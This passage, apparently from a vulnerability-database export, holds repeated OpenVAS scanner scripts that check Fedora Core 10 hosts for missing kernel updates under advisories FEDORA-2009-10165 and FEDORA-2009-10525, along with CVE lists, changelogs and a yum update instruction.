(kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to kernel 2.6.27.35:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.31\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.32\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.33\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.34\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.35\n\nChangeLog:\n\n* Sat Sep 26 2009 Chuck Ebbert 2.6.27.35-170.2.94\n- Backport appletalk: Fix skb leak when ipddp interface is not loaded\n(fixes CVE-2009-2903)\n* Sat Sep 26 2009 Chuck Ebbert 2.6.27.35-170.2.93\n- Backport KVM: x86: Disallow hypercalls for guest callers in rings > 0\n(fixes CVE-2009-3290)\n* Thu Sep 24 2009 Chuck Ebbert 2.6.27.35-170.2.92\n- Linux 2.6.27.35\n- Drop merged patches:\nlinux-2.6-nfsd-report-short-writes-fix.patch\nlinux-2.6-nfsd-report-short-writes.patch\n* Tue Sep 15 2009 Chuck Ebbert 2.6.27.34-170.2.91\n- Linux 2.6.27.34\n- Drop merged patch: linux-2.6-slub-fix-destroy-by-rcu.patch\n* Wed Sep 9 2009 Chuck Ebbert 2.6.27.32-170.2.90\n- 2.6.27.32 final\n- Drop linux-2.6-ocfs2-handle-len-0.patch, added after .32-rc1\n* Mon Sep 7 2009 Chuck Ebbert 2.6.27.32-170.2.89.rc1\n- Backport fix for b43 on ppc64 to 2.6.27 (#514787)\n* Sun Sep 6 2009 Chuck Ebbert 2.6.27.32-170.2.88.rc1\n- Add patches requested for the next stable release:\nlinux-2.6-slub-fix-destroy-by-rcu.patch (fixes bug in 2.6.27.29)\nlinux-2.6-ocfs2-handle-len-0.patch (fixes bug in 2.6.27.32-rc1)\n* Fri Sep 4 2009 Chuck Ebbert 2.6.27.32-170.2.87.rc1\n- Copy fix for NFS short write reporting from F-10 2.6.29 kernel (#493500)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update 
can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-10165\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-10165.\";\n\n\n\nif(description)\n{\n script_id(64999);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-06 02:49:40 +0200 (Tue, 06 Oct 2009)\");\n script_cve_id(\"CVE-2009-2903\", \"CVE-2009-3290\", \"CVE-2009-2847\", \"CVE-2009-2692\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1895\", \"CVE-2009-1897\", \"CVE-2009-0065\", \"CVE-2008-5079\", \"CVE-2009-3001\", \"CVE-2009-3002\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-10165 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=515392\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=524124\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=522331\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=519305\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not 
vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:33", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-10165.", "cvss3": {}, "published": "2009-10-06T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-10165 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-3001", "CVE-2008-5079", "CVE-2009-3290", "CVE-2009-0065", "CVE-2009-2407", "CVE-2009-3002", "CVE-2009-2406", "CVE-2009-2903", "CVE-2009-1897", "CVE-2009-2847"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064999", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064999", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_10165.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-10165 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to kernel 2.6.27.35:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.31\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.32\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.33\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.34\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.35\n\nChangeLog:\n\n* Sat Sep 26 2009 Chuck Ebbert 2.6.27.35-170.2.94\n- Backport appletalk: Fix skb leak when ipddp interface is not loaded\n(fixes CVE-2009-2903)\n* Sat Sep 26 2009 Chuck Ebbert 2.6.27.35-170.2.93\n- Backport KVM: x86: Disallow hypercalls for guest callers in rings > 0\n(fixes CVE-2009-3290)\n* Thu Sep 24 2009 Chuck Ebbert 2.6.27.35-170.2.92\n- Linux 2.6.27.35\n- Drop merged patches:\nlinux-2.6-nfsd-report-short-writes-fix.patch\nlinux-2.6-nfsd-report-short-writes.patch\n* Tue Sep 15 2009 Chuck Ebbert 2.6.27.34-170.2.91\n- Linux 2.6.27.34\n- Drop merged patch: linux-2.6-slub-fix-destroy-by-rcu.patch\n* Wed Sep 9 2009 Chuck Ebbert 2.6.27.32-170.2.90\n- 2.6.27.32 final\n- Drop linux-2.6-ocfs2-handle-len-0.patch, added after .32-rc1\n* Mon Sep 7 2009 Chuck Ebbert 2.6.27.32-170.2.89.rc1\n- Backport fix for b43 on ppc64 to 2.6.27 (#514787)\n* Sun Sep 6 2009 Chuck Ebbert 2.6.27.32-170.2.88.rc1\n- Add patches requested for the next stable release:\nlinux-2.6-slub-fix-destroy-by-rcu.patch (fixes bug in 2.6.27.29)\nlinux-2.6-ocfs2-handle-len-0.patch (fixes bug in 2.6.27.32-rc1)\n* Fri Sep 4 2009 Chuck Ebbert 2.6.27.32-170.2.87.rc1\n- Copy fix for NFS short write reporting from F-10 2.6.29 kernel (#493500)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update 
can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-10165\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-10165.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64999\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-06 02:49:40 +0200 (Tue, 06 Oct 2009)\");\n script_cve_id(\"CVE-2009-2903\", \"CVE-2009-3290\", \"CVE-2009-2847\", \"CVE-2009-2692\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1895\", \"CVE-2009-1897\", \"CVE-2009-0065\", \"CVE-2008-5079\", \"CVE-2009-3001\", \"CVE-2009-3002\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-10165 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=515392\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=524124\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=522331\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=519305\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not 
vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:13", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-10525.", "cvss3": {}, "published": "2009-10-19T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-10525 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-2910", "CVE-2008-5079", "CVE-2009-3290", "CVE-2009-0065", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-2908", "CVE-2009-2903", "CVE-2009-2909", "CVE-2009-1897", "CVE-2009-2847"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231066048", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066048", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_10525.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-10525 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to kernel 2.6.27.37:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.36\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.37\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-10525\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-10525.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66048\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-19 21:50:22 +0200 (Mon, 19 Oct 2009)\");\n script_cve_id(\"CVE-2009-2908\", \"CVE-2009-2903\", \"CVE-2009-3290\", \"CVE-2009-2847\", \"CVE-2009-2692\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1895\", \"CVE-2009-1897\", \"CVE-2009-0065\", \"CVE-2008-5079\", \"CVE-2009-2909\", \"CVE-2009-2910\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-10525 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=527534\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=528887\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=526788\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n 
report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:44", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-10525.", "cvss3": {}, "published": "2009-10-19T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-10525 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-2910", "CVE-2008-5079", "CVE-2009-3290", "CVE-2009-0065", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-2908", "CVE-2009-2903", "CVE-2009-2909", "CVE-2009-1897", "CVE-2009-2847"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:66048", "href": "http://plugins.openvas.org/nasl.php?oid=66048", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_10525.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-10525 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
